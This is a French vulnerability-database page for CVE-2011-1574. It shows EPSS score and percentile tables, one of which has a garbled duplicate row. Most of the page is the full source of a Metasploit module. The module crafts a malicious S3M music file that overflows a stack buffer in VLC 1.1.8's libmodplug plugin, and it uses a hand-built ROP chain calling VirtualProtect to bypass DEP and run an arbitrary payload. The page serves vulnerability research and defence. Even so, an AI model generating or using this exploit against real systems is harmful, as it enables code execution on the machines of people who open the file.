CVE-2011-1574 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	78.13%	–	–
2022-04-17	–	–	77.12%	–	–
2022-07-03	–	–	76.48%	–	–
2023-02-05	–	–	76.17%	–	–
2023-02-19	–	–	76.48%	–	–
2023-03-12	–	–	–	24.36%	–
2023-04-09	–	–	–	3%	–
2023-05-28	–	–	–	35%	–
2023-06-11	–	–	–	35%	–
2023-09-17	–	–	–	38.2%	–
2023-11-12	–	–	–	31.18%	–
2024-06-02	–	–	–	31.18%	–
2024-07-14	–	–	–	38.48%	–
2024-12-22	–	–	–	62.21%	–
2025-01-05	–	–	–	67.32%	–
2025-01-19	–	–	–	67.32%	–
2025-03-18	–	–	–	–	62.42%
2025-03-30	–	–	–	–	65.57%
2025-03-30	–	–	–	–	65.57,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2022-04-17	99%
2022-07-03	99%
2023-02-05	99%
2023-02-19	99%
2023-03-12	96%
2023-04-09	96%
2023-05-28	96%
2023-06-11	97%
2023-09-17	97%
2023-11-12	97%
2024-06-02	97%
2024-07-14	97%
2024-12-22	98%
2025-01-05	98%
2025-01-19	98%
2025-03-18	98%
2025-03-30	98%
2025-03-30	98%

## # $Id: vlc_modplug_s3m.rb 12282 2011-04-08 15:48:53Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow', 'Description' => %q{ This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR. }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], 'Version' => '$Revision: 12282 $', 'References' => [ [ 'CVE', '2011-1574' ], [ 'OSVDB', '72143' ], #[ 'BID', 'xxx' ], [ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ], [ 'URL', 'http://hackipedia.org/File%20formats/Music/html/s3mformat.php' ], [ 'URL', 'https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2011/Apr/113' ] ], 'Payload' => { 'Space' => 512 - 0x24, # Space reserved for prepended mutex code #'DisableNops' => true, }, 'Platform' => 'win', 'Targets' => [ [ 'VLC 1.1.8 on Windows XP SP3', { # vuln is in libmod_plugin.dll, rop is custom to this module } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 07, 2011', # "found: 2011-03-09" 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']), ], self.class) end def exploit num_orders = 0x14 num_instru = 0x15 num_patterns = 0x18 hdr = "\x00" * 0x1c # song name (none) hdr << [ 0x1a, # static byte 0x10, # ST3 module 0x00, # padding num_orders, num_instru, num_patterns, 0x00, # Flags 0x1320, # Created with (which tracker) 0x02, # File format information ].pack('CCvvvvvvv') hdr << "SCRM" hdr << [ 0x40, # global volume 0x06, # initial speed 0x8a, # initial tempo 0xb0, # master volume 0x10, # ultra click removal 0xfb # NOTE, non-0xfc value skips an additional loop! # 0xfc == default channel pan positions present ].pack('CCCCCC') hdr << "\x00" * 10 # includes pad and special pointer # channel settings (for 32 channels) hdr << "\x00\x08\x01\x09\x02\x0a\x03\x0b\x04\x0c\x05\x0d\x06\x0e\x07\x0f" hdr << "\xff" * 16 # orders hdr << "\x07\x08\x0c\x09\x0a\x0b\x0b\x0d\x0e\x0f\x0f\x0f\x10\x11\x12\x13" hdr << "\x14\x16\x17\xff" # parapointers to instruments hdr << [ 0x0f ].pack('v') * num_instru # parapoitners to patterns hdr << [ 0x78 ].pack('v') * num_patterns # channel default pan positions hdr << "\x00" * 32 # instruments instru = "\x01metasplo.ity" rest = "\x00" * ((0x50 * num_instru) - instru.length) # Build the rop stack rvas = rvas_libmod_plugin_xpsp3() rop = generate_rop(rvas) zero_ptr = rva2addr(rvas, 'Scratch') + 4 mutex_addr = rva2addr(rvas, 'Scratch') + 8 imp_Sleep = rva2addr(rvas, 'imp_Sleep') # A mutex to prevent double payloads locking_code = <<-EOS mov ebx, [ #{imp_Sleep} ] jmp test_lock sleep: push 0xdeadbeef call ebx test_lock: mov eax, [ #{mutex_addr} ] test eax,eax jnz sleep lock cmpxchg [ #{mutex_addr} ], ebp test eax,eax jnz sleep EOS rop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string rop << payload.encoded # This becomes the new EIP (after return) ret = rva2addr(rvas, 'pop eax / ret') rest[1267, 4] = [ ret ].pack('V') # In order to force return, we smash the this ptr on the stack and point # it so that m_nChannels turns out to be 0. rest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V') # Add the ROP stack and final payload here rest[1275, rop.length] = rop instru << rest # patterns patt = [ 0x10 ].pack('v') patt << "\x00" * 0x10 # finalize the file s3m = "" s3m << hdr instru_pad = (0x0f * 0x10) - hdr.length s3m << "\x80" * instru_pad s3m << instru # patch in exploit trigger values s3m[0x22, 2] = [ 0x220 ].pack('v') s3m[0x24, 2] = [ 0x220 ].pack('v') print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(s3m) end def rvas_libmod_plugin_xpsp3() # libmod_plugin.dll from VLC 1.1.8 (Win32) # Just return this hash { # Used as 'Ret' for target 'ret' => 0x1022, 'push eax / ret' => 0x1cc4d, 'pop eax / ret' => 0x598a2, 'mov eax, [eax+0x1c] / ret' => 0x542c9, 'pop ebx / pop ebp / ret' => 0x25e2f, 'add eax, 4 / pop ebp / ret' => 0x7028, 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad, 'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64, } end def generate_rop(rvas) # ROP fun! (XP SP3 English, Apr 10 2011) rvas.merge!({ # Instructions / Name => RVA 'BaseAddress' => 0x653c0000, 'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve 'imp_Sleep' => 0xec2dc, 'Scratch' => 0x5fbfc, 'Data' => 0x60101, #'DataAdjusted' => 0x60000 - 0x58 + 0x8, 'DataAdjusted' => 0x60000 - 0x58, }) copy_stage = <<-EOS nop push esp pop esi lea edi, [eax+0x10] push 0x7f pop ecx inc ecx rep movsd EOS copy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string if (copy_stage.length % 4) > 0 raise RuntimeError, "The copy stage is invalid" end rop_stack = [ # Resolve VirtualProtect 'pop eax / ret', 'imp_VirtualProtect', 'mov eax, [eax+0x1c] / ret', # Call VirtuaProtect 'push eax / ret', 'pop eax / ret', # after VirtualProtect # Args to VirtualProtect 'Data', # lpAddress (place holder, filled in @ runtime above) 0x1000, # dwSize 0x40, # flNewProtect 'Scratch', # lpflOldProtect # Load the pre-adjusted Data addr 'DataAdjusted', # matches pop eax / ret above ## # Write our code little stager to our newly executable memory. ## # Load the last 32-bits of code to write 'pop ebx / pop ebp / ret', copy_stage[0, 4].unpack('V').first, :unused, # ebp # Write & advance 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', copy_stage[4, 4].unpack('V').first, :unused, # esi :unused, # edi :unused, # ebp 'add eax, 4 / pop ebp / ret', :unused, # ebp # Write & advance 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', copy_stage[8, 4].unpack('V').first, :unused, # esi :unused, # edi :unused, # ebp 'add eax, 4 / pop ebp / ret', :unused, # ebp # Write & advance 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', 0xffffffb0, # adjustment value :unused, # esi :unused, # edi :unused, # ebp # Adjust eax 'sub eax, ebx / pop ebx / pop edi / pop ebp / ret', :unused, # ebx :unused, # edi :unused, # ebp # Execute the copy stage 'push eax / ret', ] rop_stack.map! { |e| if e.kind_of? String # Meta-replace (RVA) raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e] rvas['BaseAddress'] + rvas[e] elsif e == :unused # Randomize rand_text(4).unpack('V').first else # Literal e end } rop_stack.pack('V*') end def rva2addr(rvas, key) raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key] rvas['BaseAddress'] + rvas[key] end end